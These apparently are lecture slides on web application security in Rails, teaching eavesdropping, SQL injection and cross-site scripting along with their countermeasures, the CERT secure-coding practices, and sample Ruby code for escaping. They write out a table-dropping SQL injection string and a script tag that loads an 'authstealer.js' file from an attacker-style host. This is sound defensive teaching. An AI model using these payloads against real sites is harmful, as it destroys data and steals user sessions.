Security: Attacks & Countermeasures


Security: Attacks & Countermeasures (title slide; comic: http://xkcd.com/327/)

SWEBOK KAs covered so far: Software Requirements, Software Design, Software Construction, Software Testing, Software Maintenance, Software Configuration Management, Software Engineering Management, Software Engineering Process, Software Engineering Models and Methods, Software Quality, Software Engineering Professional Practice, Software Engineering Economics, Computing Foundations, Mathematical Foundations, Engineering Foundations. Today's topic: Security.

Three Common Web App Attacks and Countermeasures I’ll unfold them one by one…

What potential attack happens here? (Slide diagram: Browser <-> Ye Olde Internet <-> Rails Router -> Controller -> View / Model -> DB)
Answer: eavesdropping, packet sniffing, man-in-the-middle.

Example: an unsecured sign-up page. The submitted form data is trivial for a packet sniffer to steal.

How to prevent it? (Same diagram: Browser <-> Ye Olde Internet <-> Rails Router -> Controller -> View / Model -> DB)
Encrypt communications with SSL (HTTPS).

How to enable site-wide SSL in Rails: see Listing 7.26 of the Ruby on Rails Tutorial, 3rd ed. (https://www.railstutorial.org/book/). Enabling it also requires configuration on the production server, e.g. a signed certificate. See also http://guides.rubyonrails.org/configuring.html#rails-general-configuration

Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL

Why were the student records lost? (http://xkcd.com/327/)
The name string "Robert'); DROP TABLE Students;--" injected malicious code. But how can this happen?

Imagine a controller that looks up students by name:
id = params[:id] # => "Robert"
…
Student.where("name = '#{id}'")
The Rails ORM translates this to:
SELECT * FROM students WHERE name = 'Robert';

What if…?
id = params[:id] # => "Robert'; DROP TABLE students;--"
…
Student.where("name = '#{id}'")
The translation becomes:
SELECT * FROM students WHERE name = 'Robert'; DROP TABLE students;--';

How to prevent SQL injection?
id = params[:id] # => "Robert'; DROP TABLE students;--"
…
Student.where("name = '#{id}'")
Write it like this instead; the placeholder form automatically escapes the input:
Student.where("name = ?", id)

The translation becomes:
id = params[:id] # => "Robert'; DROP TABLE students;--"
…
Student.where("name = ?", id)
SELECT * FROM students WHERE name = 'Robert\'\; DROP TABLE students\;\-\-';
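As an added example (not code from the slides or from Rails itself), the pure-Ruby sketch below mimics how the "?" placeholder form keeps the input above inside a single SQL string literal, next to the interpolation form the slides warn against. It uses SQL-standard quote doubling rather than the adapter-specific backslash escaping shown on the slide, and all helper names are assumed.

```ruby
# Added example, not code from the slides or from Rails. It mimics how
# ActiveRecord's "?" placeholder quoting keeps attacker-controlled text inside
# one SQL string literal, beside the interpolation the slides warn about.
# All helper names here are assumed for illustration.

MALICIOUS_ID = "Robert'; DROP TABLE students;--" # the input from the slides

# Vulnerable pattern: Student.where("name = '#{id}'") splices raw text into SQL.
def interpolated_query(name)
  "SELECT * FROM students WHERE name = '#{name}'"
end

# Quote a value as a SQL string literal by doubling embedded single quotes
# (SQL-standard escaping; real adapters may escape more, e.g. backslashes).
def quote(value)
  "'" + value.to_s.gsub("'", "''") + "'"
end

# Substitute each "?" with a quoted bind value, like Student.where("name = ?", id).
def bind_query(template, *values)
  unless template.count("?") == values.size
    raise ArgumentError, "expected #{template.count('?')} bind values, got #{values.size}"
  end
  i = -1
  template.gsub("?") { quote(values[i += 1]) }
end

# Defensive check: count statement separators that sit outside string literals.
# A single well-formed query has none; a spliced payload leaves some behind.
def stray_semicolons(sql)
  sql.gsub(/'(?:[^']|'')*'/, "''").count(";")
end

if __FILE__ == $PROGRAM_NAME
  puts interpolated_query(MALICIOUS_ID)
  puts bind_query("SELECT * FROM students WHERE name = ?", MALICIOUS_ID)
end
```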

Three Common Web App Attacks and Countermeasures Attack: Eavesdropping on network communications Countermeasure: Encrypt communications with SSL Attack: SQL injection Countermeasure: Use escaped queries

Micropost example: what if a user posts the following?
Blah blah… <script src="http://mallorysevilsite.com/authstealer.js">

Malicious script runs when feed loads! Blah blah… <script src="http://mallorysevilsite.com/authstealer.js">

How to prevent cross-site scripting (XSS)? Use Rails! Hartl: "Rails automatically prevents the [XSS] problem by escaping any content inserted into view templates."
ERB translates the variable value <script src="http://mallorysevilsite.com/authstealer.js"> to its escaped form, in which < and > become &lt; and &gt;, so the browser renders the tag as text instead of loading the script.
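As an added example (not the slides' or Rails' own code), the Ruby below renders a feed through ERB with and without the escaping Hartl describes, using the standard library's ERB::Util.html_escape, which performs the same kind of entity escaping; FEED_TEMPLATE, render_feed and contains_script_tag? are names assumed here.

```ruby
require "erb"

# Added example, not code from the slides or from Rails. It renders a feed
# with and without the escaping Hartl describes, using the standard library's
# ERB::Util.html_escape; the template and helper names below are assumed.

# Constructed micropost body matching the slides' scenario.
MALICIOUS_POST = 'Blah blah... <script src="http://mallorysevilsite.com/authstealer.js">'

# A tiny feed template. With escape: true each post goes through html_escape,
# as Rails does for <%= post %>; with escape: false it is inserted verbatim,
# as <%= raw post %> or post.html_safe would do.
FEED_TEMPLATE = "<ul>" \
  "<% posts.each do |post| %>" \
  "<li><%= escape ? ERB::Util.html_escape(post) : post %></li>" \
  "<% end %></ul>"

def render_feed(posts, escape: true)
  ERB.new(FEED_TEMPLATE).result(binding) # binding exposes posts and escape
end

# Check rendered HTML for a script tag that survived rendering; escaped output
# contains "&lt;script", which this pattern does not match.
def contains_script_tag?(html)
  !!(html =~ /<script\b/i)
end

if __FILE__ == $PROGRAM_NAME
  feed = ["Hello world", MALICIOUS_POST]
  puts render_feed(feed)                # tag shown as text
  puts render_feed(feed, escape: false) # tag would execute in a browser
end
```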

Three Common Web App Attacks and Countermeasures
Attack: Eavesdropping on network communications. Countermeasure: Encrypt communications with SSL.
Attack: SQL injection. Countermeasure: Use escaped queries.
Attack: Cross-site scripting (another type of injection). Countermeasure: Use Rails (escape text).
Although these attacks are common, there are many more (e.g., cross-site request forgery – see Hartl Ch. 3).

CERT Top 10 Software Security Practices: Validate input; Heed compiler warnings; Architect and design for security policies; Keep it simple; Default deny; Adhere to the principle of least privilege; Sanitize data sent to other software; Practice defense in depth; Use effective quality assurance techniques; Adopt a software construction security standard.
US-CERT is the Computer Emergency Response Team for the United States. Taken from https://www.securecoding.cert.org/

For more attacks and countermeasures, see the Rails Security Guide http://guides.rubyonrails.org/security.html

Summary: Encrypting communication with SSL; SQL injection attacks; XSS attacks; CERT security practices. (Image: http://flic.kr/p/aCLor3)